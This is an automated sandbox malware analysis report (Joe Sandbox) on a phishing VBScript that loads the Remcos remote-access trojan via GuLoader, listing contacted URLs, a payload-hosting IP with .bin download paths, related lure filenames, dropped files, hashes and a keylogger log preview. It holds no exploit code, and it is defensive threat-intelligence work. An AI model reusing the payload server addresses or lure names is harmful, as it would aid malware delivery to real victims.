                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2582058655.0000019280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2439904128.0000000004B81000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237Hpowershell.exe, 00000002.00000002.2582058655.0000019281E1A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acpowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://go.micropowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.86.247/acipowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comwab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.237.86.247/acidpowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.2powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.24powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acidizespowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://103.237.86.247/acidipowershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.com/accounts/serviceloginwab.exefalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://aka.ms/pscore68powershell.exe, 00000002.00000002.2582058655.0000019280001000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://103.23powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ebuddy.comwab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                178.237.33.50
                		geoplugin.netNetherlands
                		8455ATOM86-ASATOM86NLfalse
                103.237.86.247
                		unknownunknown
                		133587BGNR-AP2BainandCompanySGfalse
                103.237.87.32
                		unknownunknown
                		133587BGNR-AP2BainandCompanySGtrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1467964
                Start date and time:2024-07-05 07:12:09 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:15
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:PAYMENT - STATEMENT ADVISE.vbs
                Detection:MAL
                Classification:mal100.phis.troj.spyw.expl.evad.winVBS@20/13@1/3
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 98%
                • Number of executed functions: 190
                • Number of non-executed functions: 269
                Cookbook Comments:
                • Found application associated with file extension: .vbs

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 199.232.214.172
                • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 1084 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 3528 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                01:12:57API Interceptor1x Sleep call for process: wscript.exe modified
                01:12:59API Interceptor130x Sleep call for process: powershell.exe modified
                01:14:13API Interceptor767384x Sleep call for process: wab.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                178.237.33.50Aviso de Pago __Banco Republica.pdf.bat.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                PAYMENT COPY 04.07.24.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • geoplugin.net/json.gp
                Payment- Statement Advise.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • geoplugin.net/json.gp
                PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                DHL AWB 6533732999.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                BDQfYL99b2.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                Payment Advice__Swift-MT103.pdf.bat.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                UniCredit__Avviso di Pagamento.pdf.bat.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                103.237.86.247PAYMENT COPY 04.07.24.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/HsHtCq138.bin
                Payment- Statement Advise.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/rGcyeM139.bin
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/pfoGTCLnx4.bin
                PAYMENT COPY.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/EkmwapeHusBKtnzhrLsgW0.bin
                STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/xcjLjSb128.bin
                STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/NtqoCaH77.bin
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/mbLXhRfFSSN77.bin
                Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/nsQUkTChtPKgp70.bin
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/qOreedem137.bin
                Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/YckNurPLCcwPGiweiCyGTJ2.bin

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                geoplugin.netAviso de Pago __Banco Republica.pdf.bat.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                PAYMENT COPY 04.07.24.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 178.237.33.50
                Payment- Statement Advise.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 178.237.33.50
                PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                DHL AWB 6533732999.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                BDQfYL99b2.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                Payment Advice__Swift-MT103.pdf.bat.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                UniCredit__Avviso di Pagamento.pdf.bat.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                bg.microsoft.map.fastly.nethttps://rb.gy/zsqpjaGet hashmaliciousHTMLPhisherBrowse
                • 199.232.210.172
                https://singingfiles.com/show.php?l=0&u=2156442&id=64574Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://metamesklogni.webflow.io/Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
                • 199.232.214.172
                https://sula.starladeroff.com/Get hashmaliciousUnknownBrowse
                • 199.232.214.172
                http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
                • 199.232.214.172
                http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                http://dana-aktivasi-paylater.myindo.me/Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://mail.support-xfinity.152-42-227-61.cprapid.com/Billing_Pay_Online.html?Review-VerificationMyAccountGet hashmaliciousUnknownBrowse
                • 199.232.214.172

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                BGNR-AP2BainandCompanySGPAYMENT COPY 04.07.24.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                Payment- Statement Advise.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                PAYMENT COPY.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.87.32
                STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.87.32
                Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                BGNR-AP2BainandCompanySGPAYMENT COPY 04.07.24.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                Payment- Statement Advise.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                PAYMENT COPY.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.87.32
                STATEMENT OF ACCOUNT.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.87.32
                Payment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                ATOM86-ASATOM86NLAviso de Pago __Banco Republica.pdf.bat.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                PAYMENT COPY 04.07.24.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 178.237.33.50
                Payment- Statement Advise.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 178.237.33.50
                1QP92XNATU.elfGet hashmaliciousUnknownBrowse
                • 95.142.101.193
                PO#0416_SOLICITUD_DE_PRESUPUES_O_24_cotizaci#U00f3n_materiales.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                DHL AWB 6533732999.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                3521381fadca86cfc577e8aa81ecff5f3453102559bb7e86d903d9b87db1456c_dump.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                BDQfYL99b2.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                Quotation.xlsGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                Payment Advice__Swift-MT103.pdf.bat.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\ProgramData\remcos\logs.dat

                Download File
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:data
                Category:dropped
                Size (bytes):144
                Entropy (8bit):3.379519383183141
                Encrypted:false
                SSDEEP:3:rhlKlVm29Zl5JWRal2Jl+7R0DAlBG45klovDl6v:6lVmO5YcIeeDAlOWAv
                MD5:1C625785BBAE0D28BC689D5DC6191540
                SHA1:5F9D2C1B9307E0F5CA23090C35E15AD56ABC9EDA
                SHA-256:2EE6EBAA94B4F6FB756316D2693CFB7EF15C591F57763484A41C7BF6B95A5029
                SHA-512:32B26D12CA01ED7C690CEF1FDC5F6A6FE1C01F2F654F4D6CFE18C928A7DE8778A9853AA2F304B169ED8E0748EEBBDF9D0B6E388CD87EA0567E6571D4B52AFEC5
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                Reputation:low
                Preview:....[.2.0.2.4./.0.7./.0.5. .0.1.:.1.3.:.4.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):71954
                Entropy (8bit):7.996617769952133
                Encrypted:true
                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.247897867253902
                Encrypted:false
                SSDEEP:6:kK2i9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:udDImsLNkPlE99SNxAhUe/3
                MD5:6380C8D154A87E037FEF61401AD1CF0E
                SHA1:95CAE84155D7149FC9CF8D0399372C0769297F11
                SHA-256:A53AA6D08C8FD6188C4FF3922F8BE4125FE9843881FD2A5C94491DD88BA33242
                SHA-512:F119CB49619640F008273B45561D857125AD31E7D293BC313318B274B91EAA0C497D4CBFAE7E54AB921BAF9318EF7916617F8FF007A7A430A0876EBE910D4922
                Malicious:false
                Preview:p...... ................(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json

                Download File
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:JSON data
                Category:dropped
                Size (bytes):962
                Entropy (8bit):5.013130376969173
                Encrypted:false
                SSDEEP:12:tklu+mnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qlu+KdVauKyGX85jvXhNlT3/7AcV9Wro
                MD5:F61E5CC20FBBA892FF93BFBFC9F41061
                SHA1:36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E
                SHA-256:28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
                SHA-512:5B6AD2F42A82AC91491C594714638B1EDCA26D60A9932C96CBA229176E95CA3FD2079B68449F62CBFFFFCA5DA6F4E25B7B49AF8A8696C95A4F11C54BCF451933
                Malicious:false
                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.8908305915084105
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                Malicious:false
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:NlllulJnp/p:NllU
                MD5:BC6DB77EB243BF62DC31267706650173
                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                Malicious:false
                Preview:@...e.................................X..............@..........

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0owqnpab.hwm.psm1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqdjamr5.rdk.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jl5radd4.ulg.ps1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4q1vasd.t5s.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode

                C:\Users\user\AppData\Local\Temp\bhv6385.tmp

                Download File
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x5c8a0e3c, page size 32768, DirtyShutdown, Windows version 10.0
                Category:dropped
                Size (bytes):17301504
                Entropy (8bit):0.8012478814233309
                Encrypted:false
                SSDEEP:6144:KdfjZb5aXEY2waXEY24URlMe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:IVS4e81ySaKKjLrONseWe
                MD5:16365526282C307D8A7ECF249E924571
                SHA1:71D42F0776D24C432CA2FF3B5675204C82DBB8CB
                SHA-256:8DB11711E8ABFEE844D8839D551FC1D08F2A20B9BDBEAFE650B474E5BB9DF075
                SHA-512:71912416EE7D56AD71E9A3D38DBE0118D13628CB304698A8460822CD91338505A7173093FCA9B1649C30C3CD5571378DA01CBC10033344D31EBABE4EE05FB340
                Malicious:false
                Preview:\..<... .......;!......E{ow("...{........................@..........{.......|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]..................................z.......|..........................|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj

                Download File
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                Category:dropped
                Size (bytes):2
                Entropy (8bit):1.0
                Encrypted:false
                SSDEEP:3:Qn:Qn
                MD5:F3B25701FE362EC84616A93A45CE9998
                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
